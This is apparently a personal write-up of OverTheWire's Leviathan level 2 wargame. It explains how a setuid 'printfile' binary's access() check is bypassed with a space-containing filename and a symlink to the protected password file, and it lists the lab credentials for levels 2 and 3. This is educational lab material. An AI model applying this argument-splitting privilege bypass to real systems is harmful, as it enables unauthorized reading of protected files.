Level 2 Username : leviathan2 Password :ougahZi8Ta SSH leviathan.labs.overthewire.org:2223
Note: To solve this level, I had to refer to other blogs to get the solution. I’ve provided the solution here in my words and added my understanding to it.
To solve this level, we first ssh into the leviathan2 server using the credentials provided above. We can see that there is an executable named ” printfile ” in the folder. The executable fetches the file passed by the user and prints its content on the console. Let’s see what happens if we send the file ” /etc/leviathan_pass/leviathan3 ” to it.
As we can see, the executable responds with ” You can’t have that file “. I then provided a file that we do have the rights to execute, ” /etc/leviathan_pass/leviathan2 ” and the application prints the contents of the file. To understand the inner working of the the executable, I fired gdb on two different terminals and set breakpoints at function calls to access@plt (b *main+101) and system@plt (b *main+177). On passing different files to these two terminals, we can see that the call to access@plt sets the value of $eax as 0 when our user has the access to the file and sets the value as -1 when our user does not have access to the file. Therefore, to change the course of the program, I set the value of $eax to 0 so that the program continues forward and does not create an error for the time being. For more information on access function, read this link.
On proceeding further with the program, the executable passes “/bin/cat” along with our filename to the system command. If we do not have access to the file, the system command throws a permission error, otherwise, the contents of the file are printed. At this point, I tried creating a temporary file symbolic linked to the password file and hoping that the system function call to /bin/cat would not throw any errors as I do have the access to the file I created which is linked to the password file, however, that did not work. After several attempts at changing the call structure of gdb by modifying variables, I couldn’t print the file.
At this point, I decided to search for hints and found a few blogs which identified them. The trick is to use the symbolic link in a different way.
As we can see above, I created the following two files:
SecurityTimes with a symbolic link to the password file. SecurityTimes solution
The exploit works in the following way: We pass the file “SecurityTimes solution” to the printfile executable. The file clears the access() function as the function looks at the complete filepath and as we can see, our user has the access to the file. Next, during the creation of the “/bin/cat” statement, the function assumes that these are two different files and not just one since there is a space between them. Thus, the function tries to print these two different files and since the first half of the filename exists, it prints the contents of that file which is symbolically linked to the password file. We can also create a file with the second half of the filename and put some content in it. Once the executable runs, contents of both the files would be displayed.
As you can see above, the executable displays our password and the content from our “solution” file.
Level 3 Username : leviathan3 Password : Ahdiemoo1j SSH : leviathan.labs.overthewire.org:2223